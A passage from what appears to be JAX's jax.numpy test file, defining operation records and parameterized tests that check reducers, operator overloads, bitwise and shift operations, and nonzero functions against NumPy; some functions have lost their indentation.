    op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("nanmax", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
    op_record("nanmin", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
    op_record("nanvar", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
              [], inexact=True),
    op_record("nanstd", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
              [], inexact=True),
    op_record("ptp", 1, number_dtypes, nonempty_shapes, jtu.rand_default, []),
]
# argmin/argmax variants; only tested on nonempty shapes.
JAX_ARGMINMAX_RECORDS = [
    op_record("argmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
    op_record("argmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
    op_record("nanargmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
    op_record("nanargmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
]
# Operator dunder methods, exercised via the `operator` module by
# testOperatorOverload and testBinaryOperatorDefers.
JAX_OPERATOR_OVERLOADS = [
    op_record("__add__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__sub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__mul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__eq__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__ne__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__lt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__le__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__gt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__ge__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__pos__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__neg__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__pow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
              tolerance={np.float32: 2e-4, np.complex64: 2e-4, np.complex128: 1e-14}),
    op_record("__mod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
              tolerance={np.float16: 1e-1}),
    op_record("__floordiv__", 2, default_dtypes, all_shapes,
              jtu.rand_nonzero, []),
    op_record("__truediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
              inexact=True),
    op_record("__abs__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
    # TODO(mattjj): __invert__ fails on bool dtypes because ~True == -2
    op_record("__invert__", 1, int_dtypes, all_shapes, jtu.rand_default, []),
    # TODO(mattjj): investigate these failures
    # op_record("__or__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__and__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    # op_record("__xor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__divmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
    op_record("__lshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
    op_record("__rshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
]
# Reflected (right-hand) operator dunders; driven by testRightOperatorOverload.
JAX_RIGHT_OPERATOR_OVERLOADS = [
    op_record("__radd__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__rsub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__rmul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("__rpow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
              tolerance={np.float32: 2e-4, np.complex64: 1e-3}),
    op_record("__rmod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
              tolerance={np.float16: 1e-1}),
    op_record("__rfloordiv__", 2, default_dtypes, all_shapes,
              jtu.rand_nonzero, []),
    op_record("__rtruediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
              inexact=True),
    # op_record("__ror__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__rand__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    # op_record("__rxor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
    # op_record("__rdivmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
    op_record("__rlshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
    op_record("__rrshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), [])
]
# Helper operand whose every binary operator overload returns `self`; used by
# testBinaryOperatorDefers to check that jnp arrays defer to an operand that
# overrides the operator.
class _OverrideEverything(object):
  pass

for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
  if rec.nargs == 2:
    setattr(_OverrideEverything, rec.name, lambda self, other: self)
# Helper operand whose every binary operator overload returns NotImplemented,
# forcing Python's default fallback behavior in testBinaryOperatorDefers.
class _OverrideNothing(object):
  pass

for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
  if rec.nargs == 2:
    setattr(_OverrideNothing, rec.name, lambda self, other: NotImplemented)
def _dtypes_are_compatible_for_bitwise_ops(args):
if len(args) <= 1:
return True
is_signed = lambda dtype: jnp.issubdtype(dtype, np.signedinteger)
width = lambda dtype: jnp.iinfo(dtype).bits
x, y = args
if width(x) > width(y):
x, y = y, x
# The following condition seems a little ad hoc, but seems to capture what
# numpy actually implements.
return (
is_signed(x) == is_signed(y)
or (width(x) == 32 and width(y) == 32)
or (width(x) == 32 and width(y) == 64 and is_signed(y)))
def _shapes_are_broadcast_compatible(shapes):
accumulator = np.zeros([])
for shape in shapes:
try:
accumulator = accumulator + np.zeros(shape)
except ValueError:
return False
return True
def _shapes_are_equal_length(shapes):
return all(len(shape) == len(shapes[0]) for shape in shapes[1:])
def _promote_like_jnp(fun, inexact=False):
"""Decorator that promotes the arguments of `fun` to `jnp.result_type(*args)`.
jnp and np have different type promotion semantics; this decorator allows
tests make an np reference implementation act more like an jnp
implementation.
"""
def wrapper(*args, **kw):
flat_args = tree_util.tree_leaves(args)
if inexact and not any(jnp.issubdtype(jnp.result_type(x), jnp.inexact)
for x in flat_args):
dtype = jnp.result_type(jnp.float_, *flat_args)
else:
dtype = jnp.result_type(*flat_args)
args = tree_util.tree_map(lambda a: np.asarray(a, dtype), args)
return fun(*args, **kw)
return wrapper
@jtu.with_config(jax_numpy_rank_promotion="raise")
class LaxBackedNumpyTests(jtu.JaxTestCase):
"""Tests for LAX-backed Numpy implementation."""
def _GetArgsMaker(self, rng, shapes, dtypes, np_arrays=True):
def f():
out = [rng(shape, dtype or jnp.float_)
for shape, dtype in zip(shapes, dtypes)]
if np_arrays:
return out
return [jnp.asarray(a) if isinstance(a, (np.ndarray, np.generic)) else a
for a in out]
return f
def testNotImplemented(self):
for name in jnp._NOT_IMPLEMENTED:
func = getattr(jnp, name)
with self.assertRaises(NotImplementedError):
func()
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
                                                      dtypes),
         "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
         "check_dtypes": rec.check_dtypes, "tolerance": rec.tolerance,
         "inexact": rec.inexact}
        for shapes in filter(
          _shapes_are_broadcast_compatible,
          itertools.combinations_with_replacement(rec.shapes, rec.nargs))
        for dtypes in itertools.product(
          *(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
      for rec in itertools.chain(JAX_ONE_TO_ONE_OP_RECORDS,
                                 JAX_COMPOUND_OP_RECORDS)))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testOp(self, np_op, jnp_op, rng_factory, shapes, dtypes, check_dtypes,
             tolerance, inexact):
    """Check jnp_op against np_op on random inputs, then again under jit."""
    # Silence NumPy warnings the reference implementation may emit.
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="invalid value.*")(np_op)
    np_op = jtu.ignore_warning(category=RuntimeWarning,
                               message="divide by zero.*")(np_op)
    rng = rng_factory(self.rng())
    args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
    # Combine per-dtype tolerances with the record's tolerance and defaults.
    tol = max(jtu.tolerance(dtype, tolerance) for dtype in dtypes)
    tol = functools.reduce(jtu.join_tolerance,
                           [tolerance, tol, jtu.default_tolerance()])
    self._CheckAgainstNumpy(_promote_like_jnp(np_op, inexact), jnp_op,
                            args_maker, check_dtypes=check_dtypes, tol=tol)
    self._CompileAndCheck(jnp_op, args_maker, check_dtypes=check_dtypes,
                          atol=tol, rtol=tol)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
                                                      dtypes),
         "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
         "tol": rec.tolerance}
        for shapes in filter(
          _shapes_are_broadcast_compatible,
          itertools.combinations_with_replacement(rec.shapes, rec.nargs))
        for dtypes in itertools.product(
          *(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
      for rec in JAX_OPERATOR_OVERLOADS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testOperatorOverload(self, name, rng_factory, shapes, dtypes, tol):
    """Operator dunders (__add__, __lt__, ...) compile and run correctly."""
    rng = rng_factory(self.rng())
    # np and jnp arrays have different type promotion rules; force the use of
    # jnp arrays.
    args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
    # e.g. "__add__" -> operator.add applied to the jnp operands.
    fun = lambda *xs: getattr(operator, name.strip('_'))(*xs)
    self._CompileAndCheck(fun, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
                                                      dtypes),
         "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
         "op_tolerance": rec.tolerance}
        for shapes in filter(
          _shapes_are_broadcast_compatible,
          itertools.combinations_with_replacement(rec.shapes, rec.nargs))
        for dtypes in itertools.product(
          *(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
      for rec in JAX_RIGHT_OPERATOR_OVERLOADS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testRightOperatorOverload(self, name, rng_factory, shapes, dtypes,
                                op_tolerance):
    """Reflected dunders (__radd__ etc.) compile and run correctly."""
    if shapes[1] is jtu.PYTHON_SCALAR_SHAPE:
      raise SkipTest("scalars not implemented")  # TODO(mattjj): clean up
    rng = rng_factory(self.rng())
    args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
    # Invoke the reflected method on the second operand with the first as arg.
    fun = lambda fst, snd: getattr(snd, name)(fst)
    tol = max(jtu.tolerance(dtype, op_tolerance) for dtype in dtypes)
    self._CompileAndCheck( fun, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": rec.test_name + "_{}".format(dtype),
       "rng_factory": rec.rng_factory,
       "op_name": rec.name, "dtype": dtype}
      for rec in JAX_OPERATOR_OVERLOADS if rec.nargs == 2
      for dtype in rec.dtypes))
  def testBinaryOperatorDefers(self, op_name, rng_factory, dtype):
    """Binary ops defer to an `other` operand that overrides the operator."""
    rng = rng_factory(self.rng())
    arg = jax.device_put(rng((), dtype))
    op = getattr(operator, op_name)
    # An operand overriding every operator gets control in both orders.
    other = _OverrideEverything()
    assert op(other, arg) is other
    assert op(arg, other) is other
    # When both sides return NotImplemented, Python falls back to identity
    # comparison for ==/!= and raises TypeError for everything else.
    other = _OverrideNothing()
    if op_name == "__eq__":
      assert op(other, arg) is False
      assert op(arg, other) is False
    elif op_name == "__ne__":
      assert op(other, arg) is True
      assert op(arg, other) is True
    else:
      with self.assertRaises(TypeError):
        op(other, arg)
      with self.assertRaises(TypeError):
        op(arg, other)
def testArrayEqualExamples(self):
# examples from the array_equal() docstring.
self.assertTrue(jnp.array_equal([1, 2], [1, 2]))
self.assertTrue(jnp.array_equal(np.array([1, 2]), np.array([1, 2])))
self.assertFalse(jnp.array_equal([1, 2], [1, 2, 3]))
self.assertFalse(jnp.array_equal([1, 2], [1, 4]))
a = np.array([1, np.nan])
self.assertFalse(jnp.array_equal(a, a))
self.assertTrue(jnp.array_equal(a, a, equal_nan=True))
a = np.array([1 + 1j])
b = a.copy()
a.real = np.nan
b.imag = np.nan
self.assertTrue(jnp.array_equal(a, b, equal_nan=True))
  def testArrayEquivExamples(self):
    """Exercise the examples from the array_equiv() docstring."""
    self.assertTrue(jnp.array_equiv([1, 2], [1, 2]))
    self.assertFalse(jnp.array_equiv([1, 2], [1, 3]))
    # The broadcasting cases require rank promotion to be allowed.
    with jax.numpy_rank_promotion('allow'):
      self.assertTrue(jnp.array_equiv([1, 2], [[1, 2], [1, 2]]))
      self.assertFalse(jnp.array_equiv([1, 2], [[1, 2, 1, 2], [1, 2, 1, 2]]))
      self.assertFalse(jnp.array_equiv([1, 2], [[1, 2], [1, 3]]))
  def testArrayModule(self):
    """numpy-dispatch's get_array_module should return jnp for jnp arrays."""
    if numpy_dispatch is None:
      raise SkipTest('requires https://github.com/seberg/numpy-dispatch')
    jnp_array = jnp.array(1.0)
    np_array = np.array(1.0)
    module = numpy_dispatch.get_array_module(jnp_array)
    self.assertIs(module, jnp)
    # With mixed arguments, dispatch should still resolve to jnp.
    module = numpy_dispatch.get_array_module(jnp_array, np_array)
    self.assertIs(module, jnp)
    def f(x):
      module = numpy_dispatch.get_array_module(x)
      self.assertIs(module, jnp)
      return x
    # Dispatch must also work under tracing (jit and grad).
    jax.jit(f)(jnp_array)
    jax.grad(f)(jnp_array)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": jtu.format_test_name_suffix(
            rec.test_name, shapes, dtypes),
         "rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
        for shapes in filter(
          _shapes_are_broadcast_compatible,
          itertools.combinations_with_replacement(rec.shapes, rec.nargs))
        for dtypes in filter(
          _dtypes_are_compatible_for_bitwise_ops,
          itertools.combinations_with_replacement(rec.dtypes, rec.nargs)))
      for rec in JAX_BITWISE_OP_RECORDS))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testBitwiseOp(self, np_op, jnp_op, rng_factory, shapes, dtypes):
    """Compare jnp bitwise ops against NumPy, then check them under jit."""
    rng = rng_factory(self.rng())
    if not config.x64_enabled and any(
        jnp.iinfo(dtype).bits == 64 for dtype in dtypes):
      self.skipTest("x64 types are disabled by jax_enable_x64")
    args_maker = self._GetArgsMaker(rng, shapes, dtypes)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                            check_dtypes=jtu.PYTHON_SCALAR_SHAPE not in shapes)
    self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(op.__name__, shapes, dtypes),
"op": op, "dtypes": dtypes, "shapes": shapes}
for op in [jnp.left_shift, jnp.right_shift]
for shapes in filter(
_shapes_are_broadcast_compatible,
# TODO numpy always promotes to shift dtype for zero-dim shapes:
itertools.combinations_with_replacement(nonzerodim_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, int_dtypes_no_uint64) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testShiftOpAgainstNumpy(self, op, dtypes, shapes):
dtype, shift_dtype = dtypes
signed_mix = np.issubdtype(dtype, np.signedinteger) != \
np.issubdtype(shift_dtype, np.signedinteger)
has_32 = any(np.iinfo(d).bits == 32 for d in dtypes)
promoting_to_64 = has_32 and signed_mix
if promoting_to_64 and not config.x64_enabled:
self.skipTest("np.right_shift/left_shift promoting to int64"
"differs from jnp in 32 bit mode.")
info, shift_info = map(np.iinfo, dtypes)
x_rng = jtu.rand_int(self.rng(), low=info.min, high=info.max + 1)
# NumPy requires shifts to be non-negative and below the bit width:
shift_rng = jtu.rand_int(self.rng(), high=max(info.bits, shift_info.bits))
args_maker = lambda: (x_rng(shapes[0], dtype), shift_rng(shapes[1], shift_dtype))
self._CompileAndCheck(op, args_maker)
np_op = getattr(np, op.__name__)
self._CheckAgainstNumpy(np_op, op, args_maker)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "{}_inshape={}_axis={}_dtype={}_keepdims={}".format(
            rec.test_name.capitalize(),
            jtu.format_shape_dtype_string(shape, dtype), axis,
            "None" if out_dtype is None else np.dtype(out_dtype).name, keepdims),
         "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
         "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
        for shape in rec.shapes for dtype in rec.dtypes
        for out_dtype in [None] + rec.dtypes
        for axis in list(range(-len(shape), len(shape))) + [None]
        for keepdims in [False, True])
      for rec in JAX_REDUCER_RECORDS))
  def testReducer(self, np_op, jnp_op, rng_factory, shape, dtype, out_dtype,
                  axis, keepdims, inexact):
    """Compare jnp reducers that take a dtype= argument against NumPy."""
    rng = rng_factory(self.rng())
    @jtu.ignore_warning(category=np.ComplexWarning)
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="mean of empty slice.*")
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="overflow encountered.*")
    def np_fun(x):
      # For bfloat16, run the NumPy reference in float32 instead.
      x_cast = x if dtype != jnp.bfloat16 else x.astype(np.float32)
      t = out_dtype if out_dtype != jnp.bfloat16 else np.float32
      return np_op(x_cast, axis, dtype=t, keepdims=keepdims)
    np_fun = _promote_like_jnp(np_fun, inexact)
    jnp_fun = lambda x: jnp_op(x, axis, dtype=out_dtype, keepdims=keepdims)
    jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
    args_maker = lambda: [rng(shape, dtype)]
    tol_spec = {np.float16: 1e-2, np.int32: 1E-3, np.float32: 1e-3,
                np.complex64: 1e-3, np.float64: 1e-5, np.complex128: 1e-5}
    tol = jtu.tolerance(dtype, tol_spec)
    tol = max(tol, jtu.tolerance(out_dtype, tol_spec)) if out_dtype else tol
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            check_dtypes=jnp.bfloat16 not in (dtype, out_dtype),
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
                          rtol=tol)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "{}_inshape={}_axis={}_keepdims={}".format(
            rec.test_name.capitalize(),
            jtu.format_shape_dtype_string(shape, dtype), axis, keepdims),
         "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
         "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
        for shape in rec.shapes for dtype in rec.dtypes
        for axis in list(range(-len(shape), len(shape))) + [None]
        for keepdims in [False, True])
      for rec in JAX_REDUCER_NO_DTYPE_RECORDS))
  def testReducerNoDtype(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                         keepdims, inexact):
    """Compare jnp reducers that take no dtype= argument against NumPy."""
    rng = rng_factory(self.rng())
    is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.*")
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="All-NaN slice encountered.*")
    def np_fun(x):
      # For bfloat16 inputs containing NaNs, run the NumPy reference in
      # float32 and cast the result back so dtypes still line up.
      x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
      res = np_op(x_cast, axis, keepdims=keepdims)
      res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
      return res
    np_fun = _promote_like_jnp(np_fun, inexact)
    jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims)
    args_maker = lambda: [rng(shape, dtype)]
    tol = {np.float16: 0.002}
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, rtol=tol, atol=tol)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}".format(
            rec.test_name.capitalize(),
            jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial),
         "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
         "initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
        for shape in rec.shapes for dtype in rec.dtypes
        for axis in list(range(-len(shape), len(shape))) + [None]
        for initial in [0, 1] for keepdims in [False, True])
      for rec in JAX_REDUCER_INITIAL_RECORDS))
  def testReducerInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                         keepdims, initial, inexact):
    """Compare jnp reducers that accept an `initial` value against numpy."""
    rng = rng_factory(self.rng())
    # NumPy doesn't correctly handle bfloat16 arrays with NaNs; such cases
    # are computed in float32 and cast back to bfloat16 below.
    is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.*")
    def np_fun(x):
      x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
      res = np_op(x_cast, axis, keepdims=keepdims, initial=initial)
      res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
      return res
    np_fun = _promote_like_jnp(np_fun, inexact)
    np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
    jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial)
    jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}_whereshape={}".format(
            rec.test_name.capitalize(),
            jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial,
            jtu.format_shape_dtype_string(whereshape, bool)),
         "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
         "initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
        for shape in rec.shapes for dtype in rec.dtypes
        for whereshape in _compatible_shapes(shape)
        for axis in list(range(-len(shape), len(shape))) + [None]
        for initial in [0, 1] for keepdims in [False, True])
      for rec in JAX_REDUCER_INITIAL_RECORDS))
  def testReducerWhere(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                       keepdims, initial, inexact, whereshape):
    """Compare jnp reducers with a broadcastable `where` mask against numpy."""
    if (shape in [()] + scalar_shapes and
        dtype in [jnp.int16, jnp.uint16] and
        jnp_op in [jnp.min, jnp.max]):
      self.skipTest("Known XLA failure; see https://github.com/google/jax/issues/4971.")
    rng = rng_factory(self.rng())
    # NumPy doesn't correctly handle bfloat16 arrays with NaNs; such cases
    # are computed in float32 and cast back to bfloat16 below.
    is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
    # Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
    where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.*")
    def np_fun(x):
      x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
      res = np_op(x_cast, axis, keepdims=keepdims, initial=initial, where=where)
      res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
      return res
    np_fun = _promote_like_jnp(np_fun, inexact)
    np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
    jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, initial=initial, where=where)
    jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @unittest.skipIf(numpy_version < (1, 20), "where parameter not supported in older numpy")
  @parameterized.named_parameters(itertools.chain.from_iterable(
      jtu.cases_from_list(
        {"testcase_name": "{}_inshape={}_axis={}_keepdims={}_whereshape={}".format(
            rec.test_name.capitalize(),
            jtu.format_shape_dtype_string(shape, dtype), axis, keepdims,
            jtu.format_shape_dtype_string(whereshape, bool)),
         "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
         "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name), "whereshape": whereshape,
         "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
        for shape in rec.shapes for dtype in rec.dtypes
        for whereshape in _compatible_shapes(shape)
        for axis in list(range(-len(shape), len(shape))) + [None]
        for keepdims in [False, True])
      for rec in JAX_REDUCER_WHERE_NO_INITIAL_RECORDS))
  def testReducerWhereNoInitial(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
                                keepdims, inexact, whereshape):
    """Compare jnp reducers taking `where` but no `initial` against numpy."""
    rng = rng_factory(self.rng())
    # bfloat16 cases are routed through float32 in numpy and cast back below.
    is_bf16_nan_test = dtype == jnp.bfloat16
    # Do not pass where via args_maker as that is incompatible with _promote_like_jnp.
    where = jtu.rand_bool(self.rng())(whereshape, np.bool_)
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Degrees of freedom <= 0 for slice.*")
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="Mean of empty slice.*")
    @jtu.ignore_warning(category=RuntimeWarning,
                        message="invalid value encountered in true_divide*")
    def np_fun(x):
      x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
      res = np_op(x_cast, axis, keepdims=keepdims, where=where)
      res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
      return res
    np_fun = _promote_like_jnp(np_fun, inexact)
    np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
    jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, where=where)
    jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
    args_maker = lambda: [rng(shape, dtype)]
    # NOTE(review): numpy agreement is only checked on >= 1.20.2 except for
    # all/any — presumably older numpy mishandles `where` for the other
    # reducers; confirm before relying on coverage here.
    if numpy_version >= (1, 20, 2) or np_op.__name__ in ("all", "any"):
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in all_shapes for dtype in all_dtypes
for axis in list(range(-len(shape), len(shape))) + [None]))
def testCountNonzero(self, shape, dtype, axis):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.count_nonzero(x, axis)
jnp_fun = lambda x: jnp.count_nonzero(x, axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testNonzero(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.nonzero(x)
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np_fun)
jnp_fun = lambda x: jnp.nonzero(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_size={}_fill_value={}".format(
jtu.format_shape_dtype_string(shape, dtype), size, fill_value),
"shape": shape, "dtype": dtype, "size": size, "fill_value": fill_value}
for shape in nonempty_array_shapes
for dtype in all_dtypes
for fill_value in [None, -1]
for size in [1, 5, 10]))
def testNonzeroSize(self, shape, dtype, size, fill_value):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
@jtu.ignore_warning(category=DeprecationWarning, message="Calling nonzero on 0d arrays.*")
def np_fun(x):
result = np.nonzero(x)
if size <= len(result[0]):
return tuple(arg[:size] for arg in result)
else:
return tuple(np.concatenate([arg, np.full(size - len(arg), fill_value or 0, arg.dtype)])
for arg in result)
jnp_fun = lambda x: jnp.nonzero(x, size=size, fill_value=fill_value)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testFlatNonzero(self, shape, dtype):
